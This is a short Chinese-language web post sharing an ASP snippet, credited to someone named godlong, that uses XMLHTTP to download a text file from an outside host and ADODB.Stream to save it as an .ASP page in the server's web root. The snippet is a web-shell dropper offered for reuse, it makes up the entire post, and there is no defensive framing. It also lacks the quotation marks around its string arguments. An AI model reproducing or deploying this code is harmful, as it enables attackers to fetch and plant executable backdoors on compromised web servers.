asp中透過xmlhttp下載一句話程式碼,需要的朋友可以參考分享一下
在3est活動中學習的godlong的
複製代碼代碼如下:
<%
Set xPost = createObject(Microsoft.XMLHTTP)
xPost.Open GET,http://www.fxxxx.com/1.txt,0 '下載檔案的位址
xPost.Send()
Set sGet = createObject(ADODB.Stream)
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile E:/WWWROOT/fuck1.ASP,2
%>